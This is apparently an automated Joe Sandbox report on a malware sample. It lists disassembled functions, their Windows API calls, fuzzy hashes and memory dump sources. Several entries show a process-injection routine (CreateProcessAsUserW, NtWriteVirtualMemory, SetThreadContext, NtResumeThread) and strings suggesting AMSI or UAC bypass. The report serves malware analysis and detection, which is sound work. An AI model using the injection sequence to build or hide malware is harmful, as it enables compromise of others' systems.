API String ID: 3341692771-2852464175
Opcode ID: d0d2f2cc4f2fdab6e17e63a692ad85ca5377f809b8afe12d89ec9434be50eb1e
Instruction ID: d5c0b51a0c2e4e3536c9be6de1902ce82fdc8bec97d06e270fba191d4cd8e745
Opcode Fuzzy Hash: d0d2f2cc4f2fdab6e17e63a692ad85ca5377f809b8afe12d89ec9434be50eb1e
Instruction Fuzzy Hash: 4BB1E174A816089FDB15CF99D980A9DFBFAFF89314F24D169E805AB364D730A842CF50

Function 02EBE770 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02EBE791

Part of subcall function 02EBE374: VariantClear.OLEAUT32(?), ref: 02EBE383

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 5db1e0d81818a7e84fd018e0103f41684282fe3fc32e7595e0d8f8d98cc66e74
Instruction ID: f8203e724cd9cc5b13575bf62ca83b69f56cfb001a4506a97e81e648c5fe49e0
Opcode Fuzzy Hash: 5db1e0d81818a7e84fd018e0103f41684282fe3fc32e7595e0d8f8d98cc66e74
Instruction Fuzzy Hash: 9111A3347846108BDB23AB29C9C4AE776AA9F4975079CF476F54A8B215DB34CC00CAA2

Function 02EBE40C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02EBE44C

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: ad247a7679a21f9e67d1efa66b9fc4ec6dffab7282f9f98635e603838deb7f43
Instruction ID: 56d93a4f3d69e36e786db9ce44c53c77134abd22f02e022f245dadea19b16617
Opcode Fuzzy Hash: ad247a7679a21f9e67d1efa66b9fc4ec6dffab7282f9f98635e603838deb7f43
Instruction Fuzzy Hash: 9A315E71640209AFDB16DF98C884AEB77A9EF0D318F989561F905E3240D334DA50CBA1

Function 02EC6D7C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02EC6DC9,?,?,?,00000000), ref: 02EC6DA9

Part of subcall function 02EB4C60: SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 9e4852c9714a2b082940d362d3604ca0a4e93dd1f10a5270eaf544966d4cd27f
Instruction ID: 5ec4d16e1d42da52d83da4dbcb5c3324f2d64d8b9e89b589ebbed264a38e07d8
Opcode Fuzzy Hash: 9e4852c9714a2b082940d362d3604ca0a4e93dd1f10a5270eaf544966d4cd27f
Instruction Fuzzy Hash: AFE0A0356842087BE712FAA6AD5198B7BADDF8A700B6198B5F400A3140DA309D008860

Function 02EB5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EB5886

Part of subcall function 02EB5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5AE8
Part of subcall function 02EB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B06
Part of subcall function 02EB5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B24
Part of subcall function 02EB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EB5B42
Part of subcall function 02EB5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EB5B8B
Part of subcall function 02EB5ACC: RegQueryValueExA.ADVAPI32(?,02EB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001), ref: 02EB5BA9
Part of subcall function 02EB5ACC: RegCloseKey.ADVAPI32(?,02EB5BD8,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EB5BCB

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: ce92e3e26320b356c10034375582db52c9be8ce0a02a2e91b39a23fef47e8cb5
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: D7E03971A402148BCB11DE98C8C0A873398AF08754F449961AC58DF246D7B0D9108BE0

Function 02EB7DF0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02EB7E04

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
Instruction ID: 78e0db1bec983cfd002eb97bc46897b8fe3678a5a4e90a45606e436ece1a55c5
Opcode Fuzzy Hash: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
Instruction Fuzzy Hash: 51D05B763081507BE220955A5D44EE75BDCCFC6770F10463DB558C7180D7208C01C671

Function 02ECADBC Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 02ECAB20: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02ECADA7,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECAB34
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02ECAB4C
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02ECAB5E
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02ECAB70
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02ECAB82
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02ECAB94
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02ECABA6
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02ECABB8
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02ECABCA
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02ECABDC
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02ECABEE
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02ECAC00
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02ECAC12
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02ECAC24
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02ECAC36
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02ECAC48
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02ECAC5A

Process32First.KERNEL32(?,00000128), ref: 02ECADCD

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressProc$FirstHandleModuleProcess32
String ID:
API String ID: 2774106396-0
Opcode ID: 59bfbdff52b45209e6d264c435f6246b42332e9841322429739983092c8e4b98
Instruction ID: fd52be608b94472be3c1cefddde51456ff70525f21122fd20ee8e433222925de
Opcode Fuzzy Hash: 59bfbdff52b45209e6d264c435f6246b42332e9841322429739983092c8e4b98
Instruction Fuzzy Hash: E0C012B3A61228169A1079F429844C2974ED9460EA3145472B508D2201E7154C1192E0

Function 02EB7E90 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02ED3573,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,Initialize), ref: 02EB7E9B

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
Instruction ID: af82bbb2d4d1e933a35c3557ff6a93ae556669082bf3f4d152897bef26b88b40
Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
Instruction Fuzzy Hash: D7C08CB62812010A2F52A6BC1CC12DB43C80D8823C360BE69F0B8CA6C2D321982A2860

Function 02EB7E6C Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
Instruction ID: 4403ff2ce73959ad413f457f97d5faec11aeefec2465e353dda981dde1eda607
Opcode Fuzzy Hash: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
Instruction Fuzzy Hash: 75C08CB62812000A6E5366BC2CC92CB42C90E8823C368BE65F028C65D2E731982A2810

Function 02EB4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02EB4C8B

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction ID: 5708e1abdeb103bc5966ad3fdd0d1c66fbfc24536dfb995ae00c525740892f90
Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction Fuzzy Hash: 40C012B268023057FB635699ACD07D362CC9F056A9B1450A1A508DB291E36098005AA1

Function 02EDC360 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02EDC354,00000000,00000001), ref: 02EDC370

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 0b628b4129cff53df2ce053d659c894f4bab6052689161558866209ab11249c7
Instruction ID: 96348da5271337a94165dd0f1ad781c6c71d8814737e67c21bb44cb74c30d7bd
Opcode Fuzzy Hash: 0b628b4129cff53df2ce053d659c894f4bab6052689161558866209ab11249c7
Instruction Fuzzy Hash: 0CC048A13A53406BFA21A6A55C92F73269D9744B14F20A052BB08AA2C1D1A648008AA4

Function 02EB4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02EB4C3F

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: 2c83222a4257dc5a751be3566d8c7fa3c85032179bc24fbd7d946d2223ec5b48
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: 68B092246C820515FA5A22620F207F3004C0F41A8BF84B051AF28C80E2FA00C0019C36

Function 02EB4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02EB4C57

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction ID: 41e92e41291865d5f6a8987864dfc0fb69c04064ca3fc5af4f167f4d48d6f9c3
Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction Fuzzy Hash: 66A011A88802020AAA0B22A800300AB22222EC0A88388E0A822080A0828A2A8000AE20

Function 02EB15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02EB1A03,?,02EB1FC1), ref: 02EB15E2

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 27517a970f0eac47d7ad4758503c38331371cfa6f2561b046a5607a74e281073
Instruction ID: fd023e2371a799e914eb2018bea02e3038fe1256583a6c9cd863b28b5de43f33
Opcode Fuzzy Hash: 27517a970f0eac47d7ad4758503c38331371cfa6f2561b046a5607a74e281073
Instruction Fuzzy Hash: 69F062F0B813044FDB06CFB99950342BBE7EB8A384F10C579E609DB388E77184018B10

Function 02EB1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02EB1FC1), ref: 02EB16A4

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f914fc10a2465fd8630662f19c6295c940f402a4e93fa5e3091148cb22ea540a
Instruction ID: 09f57c61397d0a8ebe767b67626200b6648daa6ef5e9fe2f5ce03c41b80a4992
Opcode Fuzzy Hash: f914fc10a2465fd8630662f19c6295c940f402a4e93fa5e3091148cb22ea540a
Instruction Fuzzy Hash: 58F090B2A446997BD7119F5A9C90783FB99FB04364F454139FA0CDB344DB70A8108B98

Function 02EB16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02EB1FE4), ref: 02EB1704

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b66fd55213d51ae8e0aa29d857001e59296dec7ceff918db3fba58459f6a9077
Instruction ID: 0acbcc49a45a3a4992c56ac4ba9b9199a49a1668910a83f1fec0f4f1b21293c9
Opcode Fuzzy Hash: b66fd55213d51ae8e0aa29d857001e59296dec7ceff918db3fba58459f6a9077
Instruction Fuzzy Hash: FDE02C75380310AFEB104A7A8C80B83BBCCEF49274F249436F208CF281C2A0E8208B20

Non-executed Functions

Function 02ECAB20 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02ECADA7,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECAB34
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02ECAB4C
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02ECAB5E
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02ECAB70
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02ECAB82
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02ECAB94
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02ECABA6
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02ECABB8
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02ECABCA
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02ECABDC
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02ECABEE
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02ECAC00
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02ECAC12
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02ECAC24
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02ECAC36
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02ECAC48
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02ECAC5A

Strings

Process32Next, xrefs: 02ECABC2
Process32First, xrefs: 02ECABB0
Thread32First, xrefs: 02ECABF8
Heap32ListNext, xrefs: 02ECAB68
kernel32.dll, xrefs: 02ECAB2F
Module32NextW, xrefs: 02ECAC52
Thread32Next, xrefs: 02ECAC0A
Module32Next, xrefs: 02ECAC2E
Heap32First, xrefs: 02ECAB7A
Heap32ListFirst, xrefs: 02ECAB56
CreateToolhelp32Snapshot, xrefs: 02ECAB44
Module32First, xrefs: 02ECAC1C
Process32NextW, xrefs: 02ECABE6
Heap32Next, xrefs: 02ECAB8C
Process32FirstW, xrefs: 02ECABD4
Toolhelp32ReadProcessMemory, xrefs: 02ECAB9E
Module32FirstW, xrefs: 02ECAC40

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: ac13108650a8bb8178f3290e522eeac122aba6dd7aba2140d19a1ac42888ac2b
Instruction ID: 988811b42b0b519fe7da42ef353304bf7faf19fdb94a746b140519f039152d3a
Opcode Fuzzy Hash: ac13108650a8bb8178f3290e522eeac122aba6dd7aba2140d19a1ac42888ac2b
Instruction Fuzzy Hash: 3E310EF1AC03189FEB05AFB4E984E66B7A9AB09345710AD79B401CF348E675A811CF16

Function 02EC8D74 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC8798: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824

GetThreadContext.KERNEL32(00000000,02F37424,ScanString,02F373A8,02ECA940,UacInitialize,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,UacInitialize,02F373A8), ref: 02EC9607

Part of subcall function 02EC7A3C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF

Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC

SetThreadContext.KERNEL32(00000000,02F37424,ScanBuffer,02F373A8,02ECA940,ScanString,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,00000000,-00000008,02F374FC,00000004,02F37500), ref: 02ECA31C
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02F37424,ScanBuffer,02F373A8,02ECA940,ScanString,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,00000000,-00000008,02F374FC), ref: 02ECA329

Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
